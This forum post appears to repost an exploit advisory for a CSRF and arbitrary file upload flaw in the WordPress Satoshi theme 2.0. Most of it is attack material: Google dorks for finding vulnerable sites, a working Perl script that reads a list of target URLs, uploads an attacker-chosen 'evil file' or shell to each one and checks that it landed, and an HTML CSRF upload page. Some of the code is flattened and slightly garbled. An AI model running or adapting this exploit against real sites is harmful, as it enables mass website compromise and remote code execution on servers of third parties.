WordPress Satoshi 2.0 Cross Site Request Forgery / File Upload

#167
Topic created · 1 Posts · 1 Views
  • WordPress Satoshi theme version 2.0 suffers from cross site request forgery and remote file upload vulnerabilities.
    MD5 | c35cb6f75567c153b011c7612c626cf3
    Download

    ####################################################################  
    # Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 05/06/2019  
    # Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com  
    # WordPress Affected Versions : 4.7.13 - 3.4.2  
    # Theme Affected Version : 2.0  
    # Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx  
    themesinfo.com/?search_type=folder&search=satoshi  
    # Theme used on : 106 websites  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : Medium  
    # Google Dorks : intext:Design By Voosh Themes  
    inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica -   
    # Vulnerability Type :   
    CWE-352 [ Cross-Site Request Forgery (CSRF) ]  
    CWE-264 [ Permissions, Privileges, and Access Controls ]  
    # PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
    # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
    # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
    ####################################################################  
    # Description About Software :  
    *****************************  
    Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.  
    ####################################################################  
    # Impact :  
    ***********  
    WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers   
    upload arbitrary files because it fails to adequately sanitize user-supplied input.   
    An attacker can exploit this vulnerability to upload arbitrary code and execute  
    it in the context of the webserver process. This may facilitate unauthorized access   
    or privilege escalation; other attacks are also possible. This WordPress Theme is  
    vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application   
    does not, or can not, sufficiently verify whether a well-formed, valid, consistent request   
    was intentionally provided by the user who submitted the request.  
    ####################################################################  
    # Vulnerability :  
    ***************  
    /wp-content/themes/satoshi/upload-file.php  
    Vulnerability Message :  
    *********************  
    error  
    Directory File Path :  
    ******************  
    /wp-content/themes/satoshi/images/[YOURFILENAME].html  
    # Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :  
    ********************************************************  
    #!/usr/bin/perl  
    use LWP::UserAgent;  
    # Coded By KingSkrupellos  
    # Cyberizm Digital Security Army  
    # Perl Exploiter By CyBeRiZM :)  
    my $qqvul ="/upload-file.php";#theme path vul  
    my $datestring = localtime();  
    ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();  
    sub randomagent {  
    my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
    );  
    my $random = $array[rand @array];  
    return($random);  
    }  
    flag();  
    print "[+] Enter List Of Target : ";  
    chomp (my $list=<>);  
    print "[+] Enter Evil File : ";  
    chomp (my $file=<>);  
    print "[+] Started : $datestring\n";  
    open(my $arq,'<'.$list) || die($!);  
    my @site = <$arq>;  
    @site = grep { !/^$/ } @site;  
    close($arq);  
    print "[".($#site+1)."] URL to test upload\n\n";   
    my $i;  
    foreach my $web(@site){$i++;  
    chomp($web);  
    if($web !~ /^(http|https):\/\//){  
    $web = 'http://'.$web;  
    }  
    print "[$i] $web \n";  
    expqq($web);#exploiting website :)  
    }   
    sub expqq{  
    my $useragent = randomagent();#Get a Random User Agent   
    my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept   
    $ua->timeout(10);  
    $ua->agent($useragent);  
    print "[Testing] Exploit Existence \n";  
    my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;  
    my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;  
    my $response = $ua->get($url);  
    if ($response

    is_success || $response

    content=~/error/){ print "[OK] Exploit Exists\n"; print "[*] Sent payload\n"; my $regex = 'success'; my $body = $ua->post( $url, Content_Type => 'form-data', Content => [ 'uploadfile' => ["$file"] ] ); if ($body

    is_success ||$body

    content=~ /$regex/){ print "[+] Payload successfully executed\n"; print "[*] Checking if shell was uploaded\n\n"; my $res = $ua->get($ss); if ($res->is_success){ print "[Upload] $_[0]/wp-content/satoshi/images/$file\n"; } else { print "[Faild] check file\n"; } } else {print "[-] Payload failed : Not vulnerable\n"; } } else { print "[No] Exploit Not Found\n"; } } sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n"; } #################################################################### Cross Site Request Forgery CSRF Exploiter : ***************************************** <!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title></title> <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script> <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script> <script type='text/javascript'>//<![CDATA[ window.onload=function(){ $(function(){ var btnUpload=$('#upload'); var status=$('#logo-upload-status'); new AjaxUpload(btnUpload, { action: 'http://localhost/wp-content/themes/satoshi/upload-file.php', name: 'uploadfile', onSubmit: function(file, ext){ /* if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ // extension is not allowed status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed'); return false; }*/ status.text('Uploading...'); }, onComplete: function(file, response){ //On completion clear the status status.text(''); //Add uploaded file to list if(response==="success"){ $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success'); $('#satoshi_logo_image').val(file); } else{ $('<li></li>').appendTo('#files').text(file).addClass('error'); } } }); }); }//]]> </script> </head> <body> <span id="logo-upload-status"></span> <input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value=""> <input type="button" class="background_pattern_button" id="upload" value="Choose Logo"> </body> </html> #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

    Source: packetstormsecurity.com

Log in to reply